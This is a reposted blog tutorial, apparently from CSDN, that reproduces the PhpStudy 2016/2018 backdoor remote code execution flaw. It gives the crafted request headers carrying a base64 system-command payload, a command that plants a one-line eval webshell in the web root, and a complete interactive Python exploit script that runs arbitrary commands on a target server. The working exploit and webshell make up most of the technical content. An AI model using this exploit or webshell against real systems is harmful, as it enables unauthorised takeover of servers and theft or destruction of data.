PhpStudy2016-2018-RCE vulnerability recurrence

Enterprise 2023-08-18 19:44:35 views: null

Vulnerability description

PHPStudyRCE (Remote Code Execution), also known as phpstudy_backdoor vulnerability, refers to a remote code execution vulnerability in PHPStudy software.

Vulnerability scope

Phpstudy software is a free PHP debugging environment program integration package in China. It can be installed at one time by integrating Apache, PHP, MySQL, phpMyAdmin and other software. It can be installed and used directly without configuration, and it can be built with one click. Among them, the 2016 and 2018 versions of phpstudy have RCE vulnerabilities formed after being maliciously tampered by hackers. This vulnerability can directly execute system commands remotely.

The exact impact of a vulnerability depends on how an attacker exploits the vulnerability. By exploiting this vulnerability, an attacker could execute arbitrary PHP code and take complete control of the affected system. Attackers can execute malicious code, access and modify sensitive data, plant backdoors, and more.

It should be noted that the vulnerability only affects systems using a specific version of the PHPStudy software, specifically versions released between January 2018 and May 2019. In the fix version released in May 2019, the vulnerability was fixed by the developer.

illustrate content
Vulnerability number phpstudy-2016,2018-RCE
Vulnerability name RCE(Remote Command|Code Execute)
Vulnerability Rating high risk
Sphere of influence phpStudy 2016-----phpStudy 2018
Vulnerability description Attackers can exploit this vulnerability to execute PHP commands, also known as the phpStudy backdoor.


 

Vulnerability environment

Link: https://pan.baidu.com/s/1_kieJmU7Azq-lMKIp9VmaA 
Extraction code: 2hf6 

Vulnerability recurrence

The specific version and server platform are not listed, please refer to the information of phpinfo 

 Use burp to capture packets and then resend the packets

exploit

Triggering conditions

Accept-Charset: c3lzdGVtKCdpcGNvbmZpZycpOw==
Accept-Encoding: gzip,deflate

tips: pay attention to spaces here

 Use the burp encoder to construct a system execution command and use base64 encoding

 get

c3lzdGVtKCdpcGNvbmZpZycpOw==

After modifying the data packet, replay it, and the source code on the right finds that ipconfig has been executed

exploit

The function of this code is to <?php@eval($_POST[cmd]);write the string to the "C:/phpStudy/WWW/shell.php" file. This PHP code will execute $_POST[cmd]the command in the variable and execute the result. This is a common phrase used to write webshells, please note that using such code is very dangerous as it allows arbitrary command execution and manipulation of the server filesystem. This code can be easily misused, for example to execute malicious commands, destroy or steal data.

system(' echo ^<?php@eval($_POST[cmd]); ?^>>"C:/phpStudy/WWW/shell.php ');

POC

POC is the abbreviation of "Proof of Concept". In the field of computer security, POC usually refers to a specific demonstration or proof code implemented by attackers or security researchers to verify the existence, utilization effect or attack method of a certain vulnerability.

Next, I will show it to you. In order to better experience the effect, I will demonstrate it in powershell

When I run this rce script, the interface below is displayed, and the usage of the tool is prompted.

When I add the website and run the script, I will be prompted to enter the command I want to execute, and then press Enter to execute the host of the remote PhpStudy server

Below is the source code

import requests
import base64
import sys

banner = '''
.---. .-.          .--.  .-.          .-.        .---.  .--.  .--. 
: .; :: :         : .--'.' `.         : :        : .; :: .--': .--'
:  _.': `-. .---. `. `. `. .'.-..-. .-' :.-..-.  :   .': :   : `;  
: :   : .. :: .; ` _`, : : : : :; :' .; :: :; :  : :.`.: :__ : :__ 
:_;   :_;:_;: ._.'`.__.' :_; `.__.'`.__.'`._. ;  :_;:_;`.__.'`.__.'
            : :                           .-. :                    
            :_;                           `._.'                    
                python *.py http://192.168.21.155/phpinfo.php
'''

if len(sys.argv) < 2:
    print(banner)
    exit()

url = sys.argv[1]

def attack(cmd):
    cmd = f"system('{cmd}');"
    cmd = base64.b64encode(cmd.encode())

    headers = {
        "User-Agent"        : "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0",
        "Accept-Charset"    : cmd,
        "Accept-Encoding"   : "gzip,deflate"
    }

    res = requests.get(url = url,headers = headers)
    rs = res.content.decode("gb2312")
    result = rs[0:rs.find("DOCTYPE html")]
    return result

if __name__ == '__main__':
    cmd = input("请输入想要执行的系统命令:")
    if cmd == 'q':
        print("感谢使用!!!")
    else:
        print(attack(cmd))

Guess you like

Origin blog.csdn.net/qq_56698744/article/details/131730964
Recommended
Ranking
error: (-215:Assertion failed) !_img.empty() in function ‘cv::imwrite‘
Database migration between Navicat servers
Minimum number of rotation of the array: Array
balenaEtcher for mac (make a boot disk software) v1.5.67
Custom processing serialization and deserialization in jackson
Mu-en-mask system development software
Mastering Regular Expressions
Find mileage Java--
Web pages can not directly concern the public micro-channel number how to do? A key to arouse public concern number of micro-channel solutions
[CodeForces - 739B] Alyona and a tree Tree + [difference] + bipartite
Daily
More
2024-05-12(28)
2024-05-11(32)
2024-05-10(34)
2024-05-09(32)
2024-05-08(18)
2024-05-07(34)
2024-05-06(6)
2024-05-05(0)
2024-05-04(18)
2024-05-03(8)

Code World

© 2018 codetd.com